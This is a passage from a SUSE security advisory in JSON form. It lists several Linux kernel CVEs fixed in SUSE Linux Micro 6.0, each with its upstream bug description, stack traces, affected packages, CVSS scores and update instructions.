kernel/locking/lockdep.c:5144\n lock_acquire+0x1e3/0x520 kernel/locking/lockdep.c:5761\n __mutex_lock_common+0x1d8/0x2530 kernel/locking/mutex.c:603\n __mutex_lock kernel/locking/mutex.c:747 [inline]\n mutex_lock_nested+0x1b/0x20 kernel/locking/mutex.c:799\n __btrfs_release_delayed_node+0x9a/0xaa0 fs/btrfs/delayed-inode.c:256\n btrfs_release_delayed_node fs/btrfs/delayed-inode.c:281 [inline]\n __btrfs_run_delayed_items+0x2b5/0x430 fs/btrfs/delayed-inode.c:1156\n btrfs_commit_transaction+0x859/0x2ff0 fs/btrfs/transaction.c:2276\n btrfs_sync_file+0xf56/0x1330 fs/btrfs/file.c:1988\n vfs_fsync_range fs/sync.c:188 [inline]\n vfs_fsync fs/sync.c:202 [inline]\n do_fsync fs/sync.c:212 [inline]\n __do_sys_fsync fs/sync.c:220 [inline]\n __se_sys_fsync fs/sync.c:218 [inline]\n __x64_sys_fsync+0x196/0x1e0 fs/sync.c:218\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\n other info that\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54224",
"url": "https://www.suse.com/security/cve/CVE-2023-54224"
},
{
"category": "external",
"summary": "SUSE Bug 1255951 for CVE-2023-54224",
"url": "https://bugzilla.suse.com/1255951"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54224"
},
{
"cve": "CVE-2023-54225",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54225"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipa: only reset hashed tables when supported\n\nLast year, the code that manages GSI channel transactions switched\nfrom using spinlock-protected linked lists to using indexes into the\nring buffer used for a channel. Recently, Google reported seeing\ntransaction reference count underflows occasionally during shutdown.\n\nDoug Anderson found a way to reproduce the issue reliably, and\nbisected the issue to the commit that eliminated the linked lists\nand the lock. The root cause was ultimately determined to be\nrelated to unused transactions being committed as part of the modem\nshutdown cleanup activity. Unused transactions are not normally\nexpected (except in error cases).\n\nThe modem uses some ranges of IPA-resident memory, and whenever it\nshuts down we zero those ranges. In ipa_filter_reset_table() a\ntransaction is allocated to zero modem filter table entries. If\nhashing is not supported, hashed table memory should not be zeroed.\nBut currently nothing prevents that, and the result is an unused\ntransaction. Something similar occurs when we zero routing table\nentries for the modem.\n\nBy preventing any attempt to clear hashed tables when hashing is not\nsupported, the reference count underflow is avoided in this case.\n\nNote that there likely remains an issue with properly freeing unused\ntransactions (if they occur due to errors). This patch addresses\nonly the underflows that Google originally reported.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54225",
"url": "https://www.suse.com/security/cve/CVE-2023-54225"
},
{
"category": "external",
"summary": "SUSE Bug 1256234 for CVE-2023-54225",
"url": "https://bugzilla.suse.com/1256234"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54225"
},
{
"cve": "CVE-2023-54227",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54227"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-mq: fix tags leak when shrink nr_hw_queues\n\nAlthough we don\u0027t need to realloc set-\u003etags[] when shrink nr_hw_queues,\nwe need to free them. Or these tags will be leaked.\n\nHow to reproduce:\n1. mount -t configfs configfs /mnt\n2. modprobe null_blk nr_devices=0 submit_queues=8\n3. mkdir /mnt/nullb/nullb0\n4. echo 1 \u003e /mnt/nullb/nullb0/power\n5. echo 4 \u003e /mnt/nullb/nullb0/submit_queues\n6. rmdir /mnt/nullb/nullb0\n\nIn step 4, will alloc 9 tags (8 submit queues and 1 poll queue), then\nin step 5, new_nr_hw_queues = 5 (4 submit queues and 1 poll queue).\nAt last in step 6, only these 5 tags are freed, the other 4 tags leaked.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54227",
"url": "https://www.suse.com/security/cve/CVE-2023-54227"
},
{
"category": "external",
"summary": "SUSE Bug 1255952 for CVE-2023-54227",
"url": "https://bugzilla.suse.com/1255952"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54227"
},
{
"cve": "CVE-2023-54229",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54229"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath11k: fix registration of 6Ghz-only phy without the full channel range\n\nBecause of what seems to be a typo, a 6Ghz-only phy for which the BDF\ndoes not allow the 7115Mhz channel will fail to register:\n\n WARNING: CPU: 2 PID: 106 at net/wireless/core.c:907 wiphy_register+0x914/0x954\n Modules linked in: ath11k_pci sbsa_gwdt\n CPU: 2 PID: 106 Comm: kworker/u8:5 Not tainted 6.3.0-rc7-next-20230418-00549-g1e096a17625a-dirty #9\n Hardware name: Freebox V7R Board (DT)\n Workqueue: ath11k_qmi_driver_event ath11k_qmi_driver_event_work\n pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : wiphy_register+0x914/0x954\n lr : ieee80211_register_hw+0x67c/0xc10\n sp : ffffff800b123aa0\n x29: ffffff800b123aa0 x28: 0000000000000000 x27: 0000000000000000\n x26: 0000000000000000 x25: 0000000000000006 x24: ffffffc008d51418\n x23: ffffffc008cb0838 x22: ffffff80176c2460 x21: 0000000000000168\n x20: ffffff80176c0000 x19: ffffff80176c03e0 x18: 0000000000000014\n x17: 00000000cbef338c x16: 00000000d2a26f21 x15: 00000000ad6bb85f\n x14: 0000000000000020 x13: 0000000000000020 x12: 00000000ffffffbd\n x11: 0000000000000208 x10: 00000000fffffdf7 x9 : ffffffc009394718\n x8 : ffffff80176c0528 x7 : 000000007fffffff x6 : 0000000000000006\n x5 : 0000000000000005 x4 : ffffff800b304284 x3 : ffffff800b304284\n x2 : ffffff800b304d98 x1 : 0000000000000000 x0 : 0000000000000000\n Call trace:\n wiphy_register+0x914/0x954\n ieee80211_register_hw+0x67c/0xc10\n ath11k_mac_register+0x7c4/0xe10\n ath11k_core_qmi_firmware_ready+0x1f4/0x570\n ath11k_qmi_driver_event_work+0x198/0x590\n process_one_work+0x1b8/0x328\n worker_thread+0x6c/0x414\n kthread+0x100/0x104\n ret_from_fork+0x10/0x20\n ---[ end trace 0000000000000000 ]---\n ath11k_pci 0002:01:00.0: ieee80211 registration failed: -22\n ath11k_pci 0002:01:00.0: failed register the radio with mac80211: -22\n ath11k_pci 0002:01:00.0: failed to create pdev core: -22",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54229",
"url": "https://www.suse.com/security/cve/CVE-2023-54229"
},
{
"category": "external",
"summary": "SUSE Bug 1255924 for CVE-2023-54229",
"url": "https://bugzilla.suse.com/1255924"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54229"
},
{
"cve": "CVE-2023-54230",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54230"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\namba: bus: fix refcount leak\n\ncommit 5de1540b7bc4 (\"drivers/amba: create devices from device tree\")\nincreases the refcount of of_node, but not releases it in\namba_device_release, so there is refcount leak. By using of_node_put\nto avoid refcount leak.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54230",
"url": "https://www.suse.com/security/cve/CVE-2023-54230"
},
{
"category": "external",
"summary": "SUSE Bug 1255925 for CVE-2023-54230",
"url": "https://bugzilla.suse.com/1255925"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54230"
},
{
"cve": "CVE-2023-54235",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54235"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI/DOE: Fix destroy_work_on_stack() race\n\nThe following debug object splat was observed in testing:\n\n ODEBUG: free active (active state 0) object: 0000000097d23782 object type: work_struct hint: doe_statemachine_work+0x0/0x510\n WARNING: CPU: 1 PID: 71 at lib/debugobjects.c:514 debug_print_object+0x7d/0xb0\n ...\n Workqueue: pci 0000:36:00.0 DOE [1 doe_statemachine_work\n RIP: 0010:debug_print_object+0x7d/0xb0\n ...\n Call Trace:\n ? debug_print_object+0x7d/0xb0\n ? __pfx_doe_statemachine_work+0x10/0x10\n debug_object_free.part.0+0x11b/0x150\n doe_statemachine_work+0x45e/0x510\n process_one_work+0x1d4/0x3c0\n\nThis occurs because destroy_work_on_stack() was called after signaling\nthe completion in the calling thread. This creates a race between\ndestroy_work_on_stack() and the task-\u003ework struct going out of scope in\npci_doe().\n\nSignal the work complete after destroying the work struct. This is safe\nbecause signal_task_complete() is the final thing the work item does and\nthe workqueue code is careful not to access the work struct after.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54235",
"url": "https://www.suse.com/security/cve/CVE-2023-54235"
},
{
"category": "external",
"summary": "SUSE Bug 1255921 for CVE-2023-54235",
"url": "https://bugzilla.suse.com/1255921"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54235"
},
{
"cve": "CVE-2023-54240",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54240"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ethernet: mtk_eth_soc: fix possible NULL pointer dereference in mtk_hwlro_get_fdir_all()\n\nrule_locs is allocated in ethtool_get_rxnfc and the size is determined by\nrule_cnt from user space. So rule_cnt needs to be check before using\nrule_locs to avoid NULL pointer dereference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
